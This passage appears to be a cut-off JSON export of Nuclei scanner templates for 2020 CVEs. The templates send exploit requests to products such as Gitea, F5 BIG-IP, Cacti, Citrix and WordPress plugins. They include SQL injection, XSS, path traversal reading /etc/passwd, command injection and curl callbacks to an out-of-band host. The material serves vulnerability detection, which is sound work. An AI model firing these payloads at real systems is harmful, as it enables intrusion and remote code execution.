\"profilePropertyCondition\"\n          }\n        }\n      ]\n    }\n  ],\n  \"sessionId\": \"nuclei\"\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","context-profile-id"],"condition":"and"},{"type":"regex","part":"body","regex":["(profile|session)(Id|Properties|Segments)","[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14144","info":{"name":"Gitea 1.1.0 - 1.12.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["Gitea:"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-5192","info":{"name":"Hospital Management System 4.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hospital/hms/doctor/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}password={{password}}&submit=&submit=\n","POST /hospital/hms/doctor/search.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-1943","info":{"name":"Apache OFBiz <=16.11.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/control/stream?contentId=%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5902","info":{"name":"F5 BIG-IP TMUI - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license","{{BaseURL}}/hsqldb%0a"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","BIG-IP release ([\\d.]+)","[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}","HSQL Database Engine Servlet"],"condition":"or"},{"type":"status","status":[200]}]},{"raw":["POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=create%20cli%20alias%20private%20list%20command%20bash\n","POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1\nHost: {{Hostname}}\n\nfileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=list%20%2Ftmp%2Fnonexistent\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=delete%20cli%20alias%20private%20list\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["h3ll0_w0Rld"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6637","info":{"name":"OpenSIS 7.3 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/account/index.php","{{BaseURL}}/opensis/index.php","{{BaseURL}}/index.php"],"body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQL STATEMENT:","<TD>UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')</TD>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9344","info":{"name":"Jira Subversion ALM for Enterprise <8.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test","{{BaseURL}}/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","jira","subversion"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24550","info":{"name":"EpiServer Find <13.2.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2020-19282","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28976","info":{"name":"WordPress Canto 1.3.0 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/canto/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Canto","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["null"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8813","info":{"name":"Cacti v1.2.8 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /graph_realtime.php?action=init HTTP/1.1\nHost: {{Hostname}}\nCookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-2733","info":{"name":"JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/fileDownloader?sec=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ACHCJK"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35985","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-15895","info":{"name":"D-Link DIR-816L 2.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/info.php?RESULT=\",msgArray);alert(document.domain);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[";alert(document.domain);","DIR-816L"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14179","info":{"name":"Atlassian Jira Server/Data Center <8.5.8/8.6.0 - 8.11.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponent!Default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"searchers\":","\"groups\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5307","info":{"name":"PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["add-category.php"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-35489","info":{"name":"WordPress Contact Form 7 - Unrestricted File Upload","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 5.3.2')"]},{"type":"word","part":"body","words":["Contact Form 7","== Changelog =="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2020-11854","info":{"name":"Micro Focus UCMDB - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27982","info":{"name":"IceWarp WebMail 11.4.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20982","info":{"name":"shadoweb wdja v1.5.1 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["location.href='</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11547","info":{"name":"PRTG Network Monitor <20.1.57.1745 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/login.htm?type=probes","{{BaseURL}}/public/login.htm?type=requests","{{BaseURL}}/public/login.htm?type=treestat"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Probe #1') && contains(body_2, '<span>Configuration Requests Sent</span>')"]},{"type":"word","part":"body","words":["prtg_network_monitor","Probes","Groups"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-21224","info":{"name":"Inspur ClusterEngine 4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"op=login&username=;`cat /etc/passwd`&password=\n","headers":{"Content-Type":"application/x-www-form-urlencoded","Referer":"{{Hostname}}/module/login/login.html"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13945","info":{"name":"Apache APISIX - Insufficiently Protected Credentials","severity":"medium"},"requests":[{"raw":["POST /apisix/admin/routes HTTP/1.1\nHost: {{Hostname}}\nX-API-KEY: edd1c9f034335f136f87ad84b625c8f1\nContent-Type: application/json\n\n{\n  \"uri\":\"/{{randstr}}\",\n  \"script\":\"local _M = {} \\n function _M.access(conf, ctx) \\n local os = require('os')\\n local args = assert(ngx.req.get_uri_args()) \\n local f =        assert(io.popen(args.cmd, 'r'))\\n local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close()  \\n end \\nreturn _M\",\n  \"upstream\":{\n    \"type\":\"roundrobin\",\n    \"nodes\":{\n      \"interact.sh:80\":1\n    }\n  }\n}\n","GET /{{randstr}}?cmd=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"action\":\"create\"","\"script\":","\"node\":"],"condition":"and"},{"type":"status","status":[201]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-16139","info":{"name":"Cisco Unified IP Conference Station 7937G - Denial-of-Service","severity":"high"},"requests":[{"raw":["POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","words":["AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20300","info":{"name":"WeiPHP 5.0 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["52c69e3a57331081823331c4e69d3f2"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-26073","info":{"name":"Cisco SD-WAN vManage Software - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"regex","regex":["root:.*:0:0:"],"part":"body"}]}]},{"id":"CVE-2020-35848","info":{"name":"Agentejo Cockpit <0.12.0 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/newpassword"],"body":"{\n  \"token\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers":[{"type":"regex","part":"body","regex":["string\\([0-9]{1,3}\\)(\\s)?\"rp-([a-f0-9-]+)\""]}]}]},{"id":"CVE-2020-29395","info":{"name":"Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/eventON/"]}]},{"method":"GET","path":["{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5412","info":{"name":"Spring Cloud Netflix - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["Jelly"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17453","info":{"name":"WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert('document.domain')//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-1956","info":{"name":"Apache Kylin 3.0.1 - Command Injection Vulnerability","severity":"high"},"requests":[{"raw":["POST /kylin/api/user/authentication HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n","POST /kylin/api/cubes/kylin_streaming_cube/%2031%60curl%20{{interactsh-url}}%60/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-13167","info":{"name":"Netsweeper <=6.4.3 - Python Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%27{{url_encode(hex_encode(cmd))}}%27.decode%28%27hex%27%29%29%23&timeout=5","{{BaseURL}}/webadmin/out"],"headers":{"Referer":"{{BaseURL}}/webadmin/admin/service_manager_data.php"},"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{rand_str}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9315","info":{"name":"Oracle iPlanet Web Server 7.0.x - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2","{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4"],"matchers-condition":"and","matchers":[{"type":"word","words":["Admin Console"]},{"type":"word","words":["serverConfigurationsGeneral","serverCertificatesGeneral"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9054","info":{"name":"Zyxel NAS Firmware 5.21- Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25213","info":{"name":"WordPress File Manager Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48\n\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"reqid\"\n\n17457a1fe6959\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"mtime[]\"\n\n1576045135\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"poc.txt\"\nContent-Type: text/plain\n\npoc-test\n--------------------------ca81ac1fececda48--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["poc.txt","added"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35749","info":{"name":"WordPress Simple Job Board <2.9.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14408","info":{"name":"Agentejo Cockpit 0.10.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["redirectTo = '/92874';alert(document.domain)//280';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15227","info":{"name":"Nette Framework - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/nette.micro/?callback=phpcredits"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Credits"]},{"type":"word","part":"header","words":["Nette Framework"]}]}]},{"id":"CVE-2020-11529","info":{"name":"Grav <1.7  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-5284","info":{"name":"Next.js <9.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/static/../server/pages-manifest.json"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\\{\"/_app\":\".*?_app\\.js\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10770","info":{"name":"Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-2103","info":{"name":"Jenkins <=2.218 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","SessionId: null"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2020-10973","info":{"name":"WAVLINK - Access Control","severity":"high"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9757","info":{"name":"Craft CMS < 3.3.0 - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}","{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["MetaLinkContainer","canonical","22344"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12720","info":{"name":"vBulletin SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nnodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\n"],"matchers":[{"type":"word","words":["vbulletinrce"]}]}]},{"id":"CVE-2020-14864","info":{"name":"Oracle Fusion - Directory Traversal/Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1","{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8193","info":{"name":"Citrix  - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: xpyZxwy6\nX-NITRO-PASS: xWXHUJ56\n\n<appfwprofile><login></login></appfwprofile>\n","GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/neo HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/stc HTTP/1.1\nHost: {{Hostname}}\n","POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<appfwprofile><login></login></appfwprofile>\n","POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<clipermission></clipermission>\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}],"extractors":[{"type":"regex","name":"randkey","regex":["(?m)[0-9]{3,10}\\.[0-9]+"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-26948","info":{"name":"Emby Server Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name or service not known"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-27191","info":{"name":"LionWiki <3.2.12 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24701","info":{"name":"OX Appsuite - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/apps/manifests?action=all&format=debug&xss=<script>alert(document.domain);</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Request with action all","<script>alert(document.domain);</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9496","info":{"name":"Apache OFBiz 17.12.03 - Cross-Site 